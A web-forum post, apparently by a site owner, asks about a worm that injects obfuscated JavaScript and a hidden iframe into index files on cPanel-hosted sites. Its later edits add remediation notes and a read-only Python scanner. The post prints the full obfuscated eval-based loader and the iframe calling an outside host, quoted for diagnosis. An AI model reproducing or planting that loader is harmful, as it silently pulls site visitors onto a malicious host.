Has anyone else seen this crop up very recently? I've had several sites hit with this error.
Parse error: syntax error, unexpected '<' in /home/public_html/index.PHP on line 39
It's caused by a worm / injection attack that dumps the following code, seemingly at random, into every index.php / index.html file it can find:
<html><body><script>date=new Date();var ar="Aw'zg>lpNu1m<0]c;erCy,aTnhE={s}i B() :[.\"ofbvdt/";try{gserkewg();}catch(a){k=new Boolean().toString()};var ar2="f108,0,-15,33,-30,6,33,-12,-78,-18,6,18,21,66,-21,-105,39,87,-60,-60,33,-18,18,21,66,-51,12,-39,9,-3,-54,12,42,-33,18,51,-96,123,-6,12,-75,-54,99,9,-75,3,63,-21,24,0,0,-15,33,-72,12,-33,18,3,48,3,-57,60,0,-18,6,-45,-33,69,-36,45,-12,24,0,0,27,-12,-78,-18,6,18,21,66,-21,-114,51,39,45,-87,51,18,-84,57,33,-72,12,-33,18,45,-9,-33,-9,36,-75,69,63,0,-117,90,30,0,-96,78,-96,45,66,-87,3,33,51,-72,72,-51,30,-72,-36,108,-72,0,96,-96,78,-96,45,66,-87,3,63,-42,63,-105,-27,90,-93,90,42,3,-63,6,-75,24,9,-33,90,-21,-24,42,-81,63,63,-57,-75,24,9,-33,90,-9,51,-78,-42,33,30,-75,126,-39,-6,6,36,-36,-75,75,45,-78,51,-36,18,42,0,-84,21,-24,-27,102,-36,6,45,-45,30,-51,39,-45,63,-42,36,-105,9,111,-87,-3,-30,33,75,12,-27,-72,9,90,-15,-102,90,-72,9,-42,9,21,105,-48,33,-72,12,-33,18,-36,105,-15,-57,60,0,-18,18,0,18,-99,45,-27,93,-45,30,-51,24,-3,33,-72,12,-33,18,3,48,3,-21,24,0,0,24,-66,-12,42,30,-30,-15,15,39,-12,-78,-18,6,18,21,66,-21,-72,9,-3,15,72,-87,27,-60,33,-18,18,21,66,-36,-96,87,33,-72,12,-33,18,-45,99,-57,78,-9,-30,-36,87,-138,138,0,-84,39,36,-102,111,-87,51,-96,81,-33,-9,-39,57,-57,69,63,0,-117,90,30,0,-96,78,-96,45,66,-87,3,33,51,-72,72,-51,30,-72,-36,108,-72,0,96,-96,78,-96,45,66,-87,3,63,-42,63,-105,-27,99,-57,78,-9,-30,51,-78,-42,33,66,15,-39,-6,6,36,-36,-75,75,45,-78,21,-75,69,18,42,0,-84,21,-66,42,78,-9,-30,51,-78,-42,33,66,-96,102,-36,6,45,-45,30,-51,9,-75,60,63,-42,36,-105,9,111,-87,-45,42,78,-9,-30,51,-78,-42,33,66,-99,33,75,12,-57,-75,33,-33,42,78,-9,-30,51,-78,-42,33,66,21,-15,-102,60,-75,33,-33,42,78,-9,-30,-36,87,-138,138,0,-84,39,36,-102,111,-87,51,-96,-3,90,42,3,-63,-69,57,-57,24,9,-33,99,-57,78,-9,-30,-36,87,-138,138,0,-84,39,36,-102,111,-87,51,-96,69,-24,42,-81,63,63,-132,57,-57,24,9,-33,99,-57,60,0,0,27,-12,-78,-18,6,18,21,66,-21,-105,39,87,-60,-60,33,-18,18,21,66,-51,12,-39,9,-3,-54,12,42,-33,18,51,-96,123,
-6,12,-75,-54,99,9,-75,3,75,-51,-45,0,30,21,63,-78,18,18,-75,117,-33,24,-21,-57,60,0,-18]".replace(k.substr(0,1),'[');pau="rn ev2010".replace(date.getFullYear()-1,"al");e=new Function("","retu"+pau);e=e();ar2=e(ar2);s="";var pos=0;for(i=0;i<ar2.length;i++){pos+=parseInt(k.replace("false","0asd"))+ar2[i]/3;s+=ar.substr(pos,1);}e(s);</script></body></html>
The code blindly inserts a JavaScript-sourced iFrame:
<iframe height="10" width="10" src="http://counterstats.cz.cc/counter.htm"style="visibility: hidden; position: absolute; left: 0pt; top: 0pt;"></iframe>
I've tried picking the site apart to see how this happened, but does anyone know which specific attack this is and how it propagates? Is it unpatched code, CPanel itself, cracked passwords, a rooted server?
EDIT
I haven't managed to pin down exactly what's going on here, but it looks like it's a CPanel thing - changing all the passwords in CPanel seems to stop repeat attacks. I left an unimportant site in this state (without cleaning up the site code) and it has been absolutely fine, whereas before it was being corrupted daily. I've contacted UK2.net and JustHost about this, but so far no response.
It also looks like the public_html folder and some of the other "system" folders were chmod'd strangely - lots of 777 where there shouldn't be. Again, no response from the hosts about this so far.
EDIT
It appears to be "Trojan.JS.Agent.bur". Trying to find out more ...
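A defensive sweep for the two symptoms described in the post (the injected script and iframe in index files, and unexpected world-writable permissions), as an added example that is not part of the original post. The function names and the sample tree are assumptions, and the hidden-iframe pattern is a heuristic that can also match legitimate pages.

```python
import os
import re
import stat

# Byte patterns copied from the injected block and iframe quoted in the post.
SIGNATURES = [
    re.compile(rb'<script>date=new Date\(\);var ar="'),      # loader prologue
    re.compile(rb'new Function\(""\s*,\s*"retu"\s*\+'),      # "retu"+pau assembles "return eval"
    re.compile(rb'<iframe[^>]*visibility:\s*hidden', re.I),  # hidden iframe (heuristic)
]
INDEX_NAME = re.compile(r'^index\.(php|html?)$', re.I)       # also matches index.PHP


def scan_webroot(root):
    """Return (infected_index_files, world_writable_paths) under root."""
    infected, loose = [], []
    if os.lstat(root).st_mode & stat.S_IWOTH:
        loose.append(root)
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            if stat.S_ISLNK(mode):
                continue                      # symlink mode bits are meaningless
            if mode & stat.S_IWOTH:
                loose.append(path)            # e.g. the unexpected 777 entries
            if stat.S_ISREG(mode) and INDEX_NAME.match(name):
                with open(path, 'rb') as fh:
                    data = fh.read()
                if any(sig.search(data) for sig in SIGNATURES):
                    infected.append(path)
    return sorted(infected), sorted(loose)


def build_sample(root):
    """Constructed test tree: one tampered index.php, one clean index.html."""
    os.makedirs(os.path.join(root, 'blog'))
    os.chmod(os.path.join(root, 'blog'), 0o777)
    with open(os.path.join(root, 'index.php'), 'wb') as fh:
        fh.write(b'<?php echo "hi"; ?>\n<html><body><script>date=new Date();'
                 b'var ar="CONSTRUCTED";</script></body></html>\n')
    with open(os.path.join(root, 'blog', 'index.html'), 'wb') as fh:
        fh.write(b'<html><body>clean page</body></html>\n')
    os.chmod(os.path.join(root, 'index.php'), 0o644)
    os.chmod(os.path.join(root, 'blog', 'index.html'), 0o644)
```

Call `scan_webroot` on a copy or read-only mount of the account's web root; it only reports paths and changes nothing, so cleanup and permission fixes remain a separate step after the passwords are rotated.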